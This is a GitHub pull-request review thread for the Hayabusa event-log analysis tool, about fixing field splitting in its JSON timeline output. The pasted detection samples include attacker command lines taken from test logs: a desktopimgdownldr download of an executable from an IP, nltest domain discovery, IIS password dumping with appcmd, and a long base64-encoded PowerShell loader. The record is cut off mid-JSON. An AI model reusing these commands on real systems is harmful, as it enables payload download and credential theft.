Fixed json fields get moved over

hitenkoku opened the pull request:
## What Changed

- Fixed a problem with incorrect field splitting in the `CommandLine` field in JSON output.

I would appreciate it if you could review when you have time.

fukusuket reviewed (changes requested):
@hitenkoku 
It seems that a parse error occurs with the jq command when executed in the following procedure🤔 Could you please confirm?🙇
```
./hayabusa-new json-timeline -d ../hayabusa-sample-evtx -o out.json
cat out.json | jq
...
parse error: Expected another key-value pair at line 52522, column 5
```

hitenkoku commented:
@fukusuket  Thanks you for pointing this out.
Fixed jq execution so that it does not generate an error in https://github.com/Yamato-Security/hayabusa/pull/1146/commits/9035e75133f8e91f67f10bfdaffa3a7c2d9eccc0 .

Sorry to keep asking you to check. Would you check it?

YamatoSecurity commented:
@hitenkoku Thank you for the update!
`ScriptBlockText` gets put inside `ScriptBlockId` now. Could you check this?
```
{
  "Timestamp": "2021-10-25 03:23:13.801 -04:00",
  "Computer": "FS03.offsec.lan",
  "Channel": "PwSh",
  "EventID": 4104,
  "Level": "info",
  "RecordID": 2960,
  "RuleTitle": "PwSh Scriptblock",
  "Details": {
    "ScriptBlock": "param($x)\\r\\nif ($x.ToUpperInvariant().Equals(\"NOTCONFIGURED\")) { $this.PSBase.CimInstanceProperties[\"MaxSAIdleTimeSeconds\"].Value = 0; } else { $this.PSBase.CimInstanceProperties[\"MaxSAIdleTimeSeconds\"].Value = [uint32]$x; }"
  },
  "ExtraFieldInfo": {
    "MessageNumber": 1,
    "MessageTotal": 1,
    "ScriptBlockId": "1c6dc9f4-ca6d-4c09-917b-8896b9cd7bb0 | ScriptBlockText: 0; | param($x)if ($x.ToUpperInvariant().Equals(\"NOTCONFIGURED\")) { $this.PSBase.CimInstanceProperties[\"MaxSAIdleTimeSeconds\"].Value = } else { $this.PSBase.CimInstanceProperties[\"MaxSAIdleTimeSeconds\"].Value = [uint32]$x; }"
  }
}
```

I am using this command to test: `./hayabusa-json-fix  json-timeline -d ../hayabusa-sample-evtx -o fix.jsonl -L -u -D`

hitenkoku commented:
@fukusuket  I apologize for the delay in responding to your request.
I have corrected the information you pointed out in .https://github.com/Yamato-Security/hayabusa/pull/1146/commits/3b4146fa4798987c8513b4064e191c30806edb43  
Would you please check it?



> @hitenkoku Thank you so much for fix :) I confirmed that there is no jq parse error!! I checked the results for hayabusa-sample-evtx, the results were as follows. It seems that there are still cases where the field is moved. 🤔 Could you check this?🙇
> 
> ```
> % cat results.csv | grep "2021-04-22 19:04:37.081 +09:00"
> "2021-04-22 19:04:37.081 +09:00","win10-02.offsec.lan","PwSh",4104,"info",135,"PwSh Scriptblock","ScriptBlock: Write-Host 'Final result: 1';","MessageNumber: 1 ¦ MessageTotal: 1 ¦ Path: ¦ ScriptBlockId: d4032236-9130-47e8-8602-626a2b5e46e7"
> % cat results.json | jq 'select ( .Timestamp == "2021-04-22 19:04:37.081 +09:00" ) '
> {
>   "Timestamp": "2021-04-22 19:04:37.081 +09:00",
>   "Computer": "win10-02.offsec.lan",
>   "Channel": "PwSh",
>   "EventID": 4104,
>   "Level": "info",
>   "RecordID": 135,
>   "RuleTitle": "PwSh Scriptblock",
>   "Details": {
>     "ScriptBlock": "Write-Host 'Final",
>     "result": "1';"
>   },
>   "ExtraFieldInfo": {
>     "MessageNumber": 1,
>     "MessageTotal": 1,
>     "Path": "",
>     "ScriptBlockId": "d4032236-9130-47e8-8602-626a2b5e46e7"
>   }
> }
> ```

YamatoSecurity commented:
@hitenkoku 
I tested it out but it seems that the splitting in the command line is still having problems:
```
{
  "Timestamp": "2021-10-21 13:16:41.916 -04:00",
  "Computer": "COMPUTER.domain.local",
  "Channel": "Sec",
  "EventID": 4688,
  "Level": "low",
  "RecordID": 60041,
  "RuleTitle": "Susp CmdLine (Possible LOLBIN)",
  "Details": {
    "Cmdline": "C:\\Windows\\system32\\cmd.exe /C nltest",
    "/dclist": "C:\\Windows\\System32\\cmd.exe",
    "Proc": "0x15d0",
    "PID": "COMPUTER$",
    "User": "0x3e7"
  },
  "ExtraFieldInfo": {
    "MandatoryLabel": "SYSTEM_INTEGRITY",
    "ParentProcessName": "C:\\Windows\\System32\\svchost.exe",
    "ProcessId": "0x888",
    "SubjectDomainName": "domain",
    "SubjectUserSid": "S-1-5-18",
    "TargetDomainName": "NT AUTHORITY",
    "TargetLogonId": "0x4f5923f",
    "TargetUserName": "SYSTEM",
    "TargetUserSid": "S-1-0-0",
    "TokenElevationType": "FULL_TOKEN"
  }
}
```

hitenkoku commented:
@YamatoSecurity  Thanks for your comment. I fixed following problems in https://github.com/Yamato-Security/hayabusa/pull/1146/commits/e1558c16cf4f50511d05284b51eb0f04725fc1cf . Would you check it?

> @hitenkoku I tested it out but it seems that the splitting in the command line is still having problems:
> 
> ```
> {
>   "Timestamp": "2021-10-21 13:16:41.916 -04:00",
>   "Computer": "COMPUTER.domain.local",
>   "Channel": "Sec",
>   "EventID": 4688,
>   "Level": "low",
>   "RecordID": 60041,
>   "RuleTitle": "Susp CmdLine (Possible LOLBIN)",
>   "Details": {
>     "Cmdline": "C:\\Windows\\system32\\cmd.exe /C nltest",
>     "/dclist": "C:\\Windows\\System32\\cmd.exe",
>     "Proc": "0x15d0",
>     "PID": "COMPUTER$",
>     "User": "0x3e7"
>   },
>   "ExtraFieldInfo": {
>     "MandatoryLabel": "SYSTEM_INTEGRITY",
>     "ParentProcessName": "C:\\Windows\\System32\\svchost.exe",
>     "ProcessId": "0x888",
>     "SubjectDomainName": "domain",
>     "SubjectUserSid": "S-1-5-18",
>     "TargetDomainName": "NT AUTHORITY",
>     "TargetLogonId": "0x4f5923f",
>     "TargetUserName": "SYSTEM",
>     "TargetUserSid": "S-1-0-0",
>     "TokenElevationType": "FULL_TOKEN"
>   }
> }
> ```

fukusuket reviewed (changes requested):
@hitenkoku 
Thank you so much for fix!! 
I checked the keys under Details with the following command. 
Some fields still seem to be moved🤔  Could you check this?🙇
```
./hayabusa json-timeline -d ../hayabusa-sample-evtx -o results.json -C
cat results.json | jq 'select ((.Details != "-") and (.EventID == 4104))' | jq .Details | jq keys | sort | uniq
  "(@danielhbohannon)\\r\\nLicense",
  "2010",
  "Dependencies",
  "Function",
  "Invoke-Obfuscation",
  "Line",
  "Name",
  "Out-ConcatenatedString\\r\\nAuthor",
  "Out-ObfuscatedMemberTokenLevel3\\r\\nAuthor",
  "Out-ObfuscatedStringCommand\\r\\nAuthor",
  "Out-ObfuscatedTypeToken\\r\\nAuthor",
  "Out-RandomPowerShellStdInInvokeSyntax\\r\\nAuthor",
  "Out-StringDelimitedConcatenatedAndReordered\\r\\nAuthor",
  "ScriptBlock"
  "ScriptBlock",
  "Show-HelpMenu\\r\\nAuthor"
  "\"<REDACTED\"",
  "\"Error\"",
  "\"`nERROR\"",
  "\"`nWARNING\"",
  "error"
  "is"
  "log"
  "obfuscation"
  "options"
  "ordering"
  "rundll32.exe"
[
]
```

hitenkoku commented:
@YamatoSecurity  I have added key extraction criteria.
I tried entering the jq command you gave me in this environment, but was unable to extract it, so would you please check there as well?

`cat ... .json | jq . `, but I have confirmed that it is possible to run.


> @hitenkoku Thank you so much for fix!! I checked the keys under Details with the following command. Some fields still seem to be moved🤔 Could you check this?🙇
> 
> ```
> ./hayabusa json-timeline -d ../hayabusa-sample-evtx -o results.json -C
> cat results.json | jq 'select ((.Details != "-") and (.EventID == 4104))' | jq .Details | jq keys | sort | uniq
>   "(@danielhbohannon)\\r\\nLicense",
>   "2010",
>   "Dependencies",
>   "Function",
>   "Invoke-Obfuscation",
>   "Line",
>   "Name",
>   "Out-ConcatenatedString\\r\\nAuthor",
>   "Out-ObfuscatedMemberTokenLevel3\\r\\nAuthor",
>   "Out-ObfuscatedStringCommand\\r\\nAuthor",
>   "Out-ObfuscatedTypeToken\\r\\nAuthor",
>   "Out-RandomPowerShellStdInInvokeSyntax\\r\\nAuthor",
>   "Out-StringDelimitedConcatenatedAndReordered\\r\\nAuthor",
>   "ScriptBlock"
>   "ScriptBlock",
>   "Show-HelpMenu\\r\\nAuthor"
>   "\"<REDACTED\"",
>   "\"Error\"",
>   "\"`nERROR\"",
>   "\"`nWARNING\"",
>   "error"
>   "is"
>   "log"
>   "obfuscation"
>   "options"
>   "ordering"
>   "rundll32.exe"
> [
> ]
> ```

fukusuket commented:
@hitenkoku 
Thank you so much for fix :) I checked [b02cfac](https://github.com/Yamato-Security/hayabusa/pull/1146/commits/b02cfac346271a7b451a64006f5e1e22da7de302), It's a lot better!!, but there seems to be a few fields that have been moved. Is it difficult to deal with this? 🤔
```
 ./hayabusa json-timeline -d ../hayabusa-sample-evtx -o results.json -C
cat results.json | jq 'select ((.Details != "-") and (.EventID == 4104))' | jq .Details | jq keys | sort | uniq
  "Application",
  "Dependencies",
  "Function",
  "Invoke-Obfuscation",
  "Out-ConcatenatedString\\r\\nAuthor",
  "Out-ObfuscatedCommandTokenLevel2\\r\\nAuthor",
  "Out-ObfuscatedMemberTokenLevel3\\r\\nAuthor",
  "Out-ObfuscatedStringCommand\\r\\nAuthor",
  "Out-ObfuscatedStringTokenLevel1\\r\\nAuthor",
  "Out-ObfuscatedTypeToken\\r\\nAuthor",
  "Out-RandomPowerShellStdInInvokeSyntax\\r\\nAuthor",
  "Out-StringDelimitedConcatenatedAndReordered\\r\\nAuthor",
  "ScriptBlock"
  "ScriptBlock",
  "Show-HelpMenu\\r\\nAuthor"
[
]
```

fukusuket commented:
I'm sorry for commenting so many times🙇 
Conversely, there seems to be a case where the field name is no longer extracted ... 😭

EID`4688`, `Proc/User/PID/LID` fields are not extracted.
```
{
  "Timestamp": "2016-08-30 20:36:06.652 +09:00",
  "Computer": "IE10Win7",
  "Channel": "Sec",
  "EventID": 4688,
  "Level": "info",
  "RecordID": 8402,
  "RuleTitle": "Proc Exec",
  "Details": {
    "Cmdline": "\"C:\\Windows\\system32\\notepad.exe\" : Proc: C:\\Windows\\System32\\notepad.exe: PID: 0x1324: User: IEUser: LID: 0x4d011\""
  },
  "ExtraFieldInfo": {
    "CommandLine": "\"C:\\Windows\\system32\\notepad.exe\"",
    "ProcessId": "0xa30",
    "SubjectDomainName": "IE10WIN7",
    "SubjectUserSid": "S-1-5-21-3463664321-2923530833-3546627382-1000",
    "TokenElevationType": "LIMITED_TOKEN"
  }
}
```

EID`1`, `Proc/User/LID/PID/PGUID` fields are not extracted.
```
{
  "Timestamp": "2022-08-29 14:35:43.195 +09:00",
  "Computer": "DESKTOP-VQBONAV",
  "Channel": "Sysmon",
  "EventID": 1,
  "Level": "high",
  "RecordID": 1906,
  "RuleTitle": "Suspicious Desktopimgdownldr Command",
  "Details": {
    "Cmdline": "\"C:\\Windows\\system32\\desktopimgdownldr.exe\" /lockscreenurl:http://192.168.158.128:8000/calc.exe /eventName:desktopimgdownldr: Proc: C:\\Windows\\System32\\desktopimgdownldr.exe: User: DESKTOP-VQBONAV\\user\"",
    "ParentCmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" : LID: 0x6addb: LGUID: 3E153517-4E00-630C-DBAD-060000000000: PID: 60: PGUID: 3E153517-502F-630C-DB00-000000000500\"",
    "ParentPID": 312,
    "ParentPGUID": "3E153517-4EE4-630C-BA00-000000000500",
    "Description": "desktopimgdownldr.exe",
    "Product": "Microsoft® Windows® Operating System",
    "Company": "Microsoft Corporation",
    "Hashes": "MD5=0E8109FF251EE8C467F3F3641A2AFDDB,SHA256=AAADA36880E08C0B37ED6A1F6FF605144C650D987C0F8049347E9DD5A04CDB4E,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA"
  },
  "ExtraFieldInfo": {
    "CurrentDirectory": "C:\\Windows\\system32\\",
    "FileVersion": "10.0.18362.1 (WinBuild.160101.0800)",
    "IntegrityLevel": "High",
    "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"",
    "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "RuleName": "-",
    "TerminalSessionId": 1,
    "UtcTime": "2022-08-29 05:35:43.167"
  }
}
```

hitenkoku commented:
Thanks for your comment. 

I have changed the key extraction criteria in https://github.com/Yamato-Security/hayabusa/pull/1146/commits/593af2d87973f4127f873d91223f3d3b78250b90 . It was caused by changing the number of characters, so I modified that. I confirmed that Proc/User/PID/LID is extracted in this environment. Could you please confirm this for us?

> I'm sorry for commenting so many times🙇 Conversely, there seems to be a case where the field name is no longer extracted ... 😭
> 
> EID`4688`, `Proc/User/PID/LID` fields are not extracted.
> 
> ```
> {
>   "Timestamp": "2016-08-30 20:36:06.652 +09:00",
>   "Computer": "IE10Win7",
>   "Channel": "Sec",
>   "EventID": 4688,
>   "Level": "info",
>   "RecordID": 8402,
>   "RuleTitle": "Proc Exec",
>   "Details": {
>     "Cmdline": "\"C:\\Windows\\system32\\notepad.exe\" : Proc: C:\\Windows\\System32\\notepad.exe: PID: 0x1324: User: IEUser: LID: 0x4d011\""
>   },
>   "ExtraFieldInfo": {
>     "CommandLine": "\"C:\\Windows\\system32\\notepad.exe\"",
>     "ProcessId": "0xa30",
>     "SubjectDomainName": "IE10WIN7",
>     "SubjectUserSid": "S-1-5-21-3463664321-2923530833-3546627382-1000",
>     "TokenElevationType": "LIMITED_TOKEN"
>   }
> }
> ```
> 
> EID`1`, `Proc/User/LID/PID/PGUID` fields are not extracted.
> 
> ```
> {
>   "Timestamp": "2022-08-29 14:35:43.195 +09:00",
>   "Computer": "DESKTOP-VQBONAV",
>   "Channel": "Sysmon",
>   "EventID": 1,
>   "Level": "high",
>   "RecordID": 1906,
>   "RuleTitle": "Suspicious Desktopimgdownldr Command",
>   "Details": {
>     "Cmdline": "\"C:\\Windows\\system32\\desktopimgdownldr.exe\" /lockscreenurl:http://192.168.158.128:8000/calc.exe /eventName:desktopimgdownldr: Proc: C:\\Windows\\System32\\desktopimgdownldr.exe: User: DESKTOP-VQBONAV\\user\"",
>     "ParentCmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" : LID: 0x6addb: LGUID: 3E153517-4E00-630C-DBAD-060000000000: PID: 60: PGUID: 3E153517-502F-630C-DB00-000000000500\"",
>     "ParentPID": 312,
>     "ParentPGUID": "3E153517-4EE4-630C-BA00-000000000500",
>     "Description": "desktopimgdownldr.exe",
>     "Product": "Microsoft® Windows® Operating System",
>     "Company": "Microsoft Corporation",
>     "Hashes": "MD5=0E8109FF251EE8C467F3F3641A2AFDDB,SHA256=AAADA36880E08C0B37ED6A1F6FF605144C650D987C0F8049347E9DD5A04CDB4E,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA"
>   },
>   "ExtraFieldInfo": {
>     "CurrentDirectory": "C:\\Windows\\system32\\",
>     "FileVersion": "10.0.18362.1 (WinBuild.160101.0800)",
>     "IntegrityLevel": "High",
>     "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"",
>     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
>     "RuleName": "-",
>     "TerminalSessionId": 1,
>     "UtcTime": "2022-08-29 05:35:43.167"
>   }
> }
> ```

hitenkoku commented:
@fukusuket  Thanks for your comment. 

I have changed the key extraction criteria in https://github.com/Yamato-Security/hayabusa/pull/1146/commits/593af2d87973f4127f873d91223f3d3b78250b90 . It was caused by changing the number of characters, so I modified that. I confirmed that Proc/User/PID/LID is extracted in this environment. Could you please confirm this for us?

> I'm sorry for commenting so many times🙇 Conversely, there seems to be a case where the field name is no longer extracted ... 😭
> 
> EID`4688`, `Proc/User/PID/LID` fields are not extracted.
> 
> ```
> {
>   "Timestamp": "2016-08-30 20:36:06.652 +09:00",
>   "Computer": "IE10Win7",
>   "Channel": "Sec",
>   "EventID": 4688,
>   "Level": "info",
>   "RecordID": 8402,
>   "RuleTitle": "Proc Exec",
>   "Details": {
>     "Cmdline": "\"C:\\Windows\\system32\\notepad.exe\" : Proc: C:\\Windows\\System32\\notepad.exe: PID: 0x1324: User: IEUser: LID: 0x4d011\""
>   },
>   "ExtraFieldInfo": {
>     "CommandLine": "\"C:\\Windows\\system32\\notepad.exe\"",
>     "ProcessId": "0xa30",
>     "SubjectDomainName": "IE10WIN7",
>     "SubjectUserSid": "S-1-5-21-3463664321-2923530833-3546627382-1000",
>     "TokenElevationType": "LIMITED_TOKEN"
>   }
> }
> ```
> 
> EID`1`, `Proc/User/LID/PID/PGUID` fields are not extracted.
> 
> ```
> {
>   "Timestamp": "2022-08-29 14:35:43.195 +09:00",
>   "Computer": "DESKTOP-VQBONAV",
>   "Channel": "Sysmon",
>   "EventID": 1,
>   "Level": "high",
>   "RecordID": 1906,
>   "RuleTitle": "Suspicious Desktopimgdownldr Command",
>   "Details": {
>     "Cmdline": "\"C:\\Windows\\system32\\desktopimgdownldr.exe\" /lockscreenurl:http://192.168.158.128:8000/calc.exe /eventName:desktopimgdownldr: Proc: C:\\Windows\\System32\\desktopimgdownldr.exe: User: DESKTOP-VQBONAV\\user\"",
>     "ParentCmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" : LID: 0x6addb: LGUID: 3E153517-4E00-630C-DBAD-060000000000: PID: 60: PGUID: 3E153517-502F-630C-DB00-000000000500\"",
>     "ParentPID": 312,
>     "ParentPGUID": "3E153517-4EE4-630C-BA00-000000000500",
>     "Description": "desktopimgdownldr.exe",
>     "Product": "Microsoft® Windows® Operating System",
>     "Company": "Microsoft Corporation",
>     "Hashes": "MD5=0E8109FF251EE8C467F3F3641A2AFDDB,SHA256=AAADA36880E08C0B37ED6A1F6FF605144C650D987C0F8049347E9DD5A04CDB4E,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA"
>   },
>   "ExtraFieldInfo": {
>     "CurrentDirectory": "C:\\Windows\\system32\\",
>     "FileVersion": "10.0.18362.1 (WinBuild.160101.0800)",
>     "IntegrityLevel": "High",
>     "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"",
>     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
>     "RuleName": "-",
>     "TerminalSessionId": 1,
>     "UtcTime": "2022-08-29 05:35:43.167"
>   }
> }
> ```

fukusuket commented:
@hitenkoku @YamatoSecurity 
Thank you so much for quick fix :) I confirmed following case fixed!!
https://github.com/Yamato-Security/hayabusa/pull/1146#issuecomment-1663136522

Unfortunately, the following cases do not seem to have been resolved😭
https://github.com/Yamato-Security/hayabusa/pull/1146#issuecomment-1662928841
The number of field names under `Details` and `EID 4104` is as follows. It can be very difficult to deal with completely...🤔
```
cat out.json | jq 'select ((.Details != "-") and (.EventID == 4104))' | jq .Details | jq keys | sort | uniq -c | sort -nr
1135 ]
1135 [
1123   "ScriptBlock"
  45   "Function",
  12   "ScriptBlock",
  12   "Invoke-Obfuscation",
  11   "Todo"
   4   "Dependencies",
   3   "Out-ObfuscatedCommandTokenLevel2\\r\\nAuthor",
   3   "Out-ConcatenatedString\\r\\nAuthor",
   2   "Application",
   1   "Show-HelpMenu\\r\\nAuthor"
   1   "Out-StringDelimitedConcatenatedAndReordered\\r\\nAuthor",
   1   "Out-RandomPowerShellStdInInvokeSyntax\\r\\nAuthor",
   1   "Out-ObfuscatedTypeToken\\r\\nAuthor",
   1   "Out-ObfuscatedStringTokenLevel1\\r\\nAuthor",
   1   "Out-ObfuscatedStringCommand\\r\\nAuthor",
   1   "Out-ObfuscatedMemberTokenLevel3\\r\\nAuthor",
```

hitenkoku commented:
@fukusuket  Thanks for your check.

I fixed to exclude key separate included newline character in https://github.com/Yamato-Security/hayabusa/pull/1146/commits/8f7d9131676078ccad731f170a4bd0c888e89268. 

I think this has addressed some of the areas that we could have handled.


> @hitenkoku @YamatoSecurity Thank you so much for quick fix :) I confirmed following case fixed!! [#1146 (comment)](https://github.com/Yamato-Security/hayabusa/pull/1146#issuecomment-1663136522)
> 
> Unfortunately, the following cases do not seem to have been resolved😭 [#1146 (comment)](https://github.com/Yamato-Security/hayabusa/pull/1146#issuecomment-1662928841) The number of field names under `Details` and `EID 4104` is as follows. It can be very difficult to deal with completely...🤔
> 
> ```
> cat out.json | jq 'select ((.Details != "-") and (.EventID == 4104))' | jq .Details | jq keys | sort | uniq -c | sort -nr
> 1135 ]
> 1135 [
> 1123   "ScriptBlock"
>   45   "Function",
>   12   "ScriptBlock",
>   12   "Invoke-Obfuscation",
>   11   "Todo"
>    4   "Dependencies",
>    3   "Out-ObfuscatedCommandTokenLevel2\\r\\nAuthor",
>    3   "Out-ConcatenatedString\\r\\nAuthor",
>    2   "Application",
>    1   "Show-HelpMenu\\r\\nAuthor"
>    1   "Out-StringDelimitedConcatenatedAndReordered\\r\\nAuthor",
>    1   "Out-RandomPowerShellStdInInvokeSyntax\\r\\nAuthor",
>    1   "Out-ObfuscatedTypeToken\\r\\nAuthor",
>    1   "Out-ObfuscatedStringTokenLevel1\\r\\nAuthor",
>    1   "Out-ObfuscatedStringCommand\\r\\nAuthor",
>    1   "Out-ObfuscatedMemberTokenLevel3\\r\\nAuthor",
> ```

fukusuket reviewed (commented):
@hitenkoku 
Thank you so much for fix!!
Much improved!💪 It would be nice if the following fields were output in the correct positions.
```
cat out.json | jq 'select ((.Details != "-") and (.EventID == 4104))' | jq .Details | jq keys | sort | uniq -c | sort -nr
1135 ]
1135 [
1124   "ScriptBlock"
  12   "Invoke-Obfuscation",
  11   "Todo"
  11   "ScriptBlock",
   2   "Application",
   1   "Function",
```

fukusuket reviewed (approved):
@hitenkoku @YamatoSecurity 
Thank you so much for fix!! 

It's improved compared to main as follows, so I think it's okay to merge it once. How do you think?

 It seems that it will take time to completely fix it, so I think it would be better to manage it with another issue :)

This PR
```
cat new.json | jq 'select ((.Details != "-") and (.EventID == 4104))' | jq .Details | jq keys | sort | uniq -c | sort -nr

1135 ]
1135 [
1124   "ScriptBlock"
  12   "Invoke-Obfuscation",
  11   "Todo"
  11   "ScriptBlock",
   2   "Application",
   1   "Function",
```

main
```
cat ../new.json | jq 'select ((.Details != "-") and (.EventID == 4104))' | jq .Details | jq keys | sort | uniq -c | sort -nr

1135 ]
1135 [
1114   "ScriptBlock"
  36   "Function",
  21   "ScriptBlock",
   6   "ordering"
   6   "\"Error\"",
   5   "(@danielhbohannon)\\r\\nLicense",
   3   "rundll32.exe"
   3   "is"
   3   "Out-ConcatenatedString\\r\\nAuthor",
   3   "Dependencies",
   2   "options"
   2   "obfuscation"
   2   "log"
   2   "\"`nERROR\"",
   2   "Name",
   2   "Line",
   2   "Invoke-Obfuscation",
   2   "2010",
   1   "result"
   1   "error"
   1   "\"`nWARNING\"",
   1   "\"<REDACTED\"",
   1   "Show-HelpMenu\\r\\nAuthor"
   1   "Out-StringDelimitedConcatenatedAndReordered\\r\\nAuthor",
   1   "Out-RandomPowerShellStdInInvokeSyntax\\r\\nAuthor",
   1   "Out-ObfuscatedTypeToken\\r\\nAuthor",
   1   "Out-ObfuscatedStringCommand\\r\\nAuthor",
   1   "Out-ObfuscatedMemberTokenLevel3\\r\\nAuthor",
```

YamatoSecurity commented:
@hitenkoku Thanks for the fix! I am still getting parse errors though:
`./target/release/hayabusa json-timeline -L -f "../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx" -o test.jsonl -C`

`cat test.jsonl | jq 'select (.Details.LID == "365ABB72-B26B-5CEA-0000-002023240800")'`

```
{
  "Timestamp": "2019-05-26 21:29:19.784 -04:00",
  "Computer": "IEWIN7",
  "Channel": "Sysmon",
  "EventID": 1,
  "Level": "high",
  "RecordID": 5967,
  "RuleTitle": "Microsoft IIS Service Account Password Dumped",
  "Details": {
    "Cmdline": "\"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"list vdir \"Line: 0\" /text:password\"",
    "Number": "C:\\Windows\\System32\\inetsrv\\appcmd.exe",
    "Proc": "IIS APPPOOL\\DefaultAppPool",
    "User": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"-nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==\"",
    "ParentCmdline": "0x82423",
    "LID": "365ABB72-B26B-5CEA-0000-002023240800",
    "LGUID": 3844,
    "PID": "365ABB72-3D6F-5CEB-0000-0010F2CFFF00",
    "PGUID": 2584,
    "ParentPID": "365ABB72-3D4A-5CEB-0000-0010FA93FD00",
    "ParentPGUID": "Application Server Command Line Admin Tool",
    "Description": "Internet Information Services",
    "Product": "Microsoft Corporation",
    "Company": "SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45"
  },
  "ExtraFieldInfo": {
    "CurrentDirectory": "C:\\Windows\\Temp\\",
    "FileVersion": "7.5.7600.16385 (win7_rtm.090713-1255)",
    "IntegrityLevel": "High",
    "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "RuleName": "",
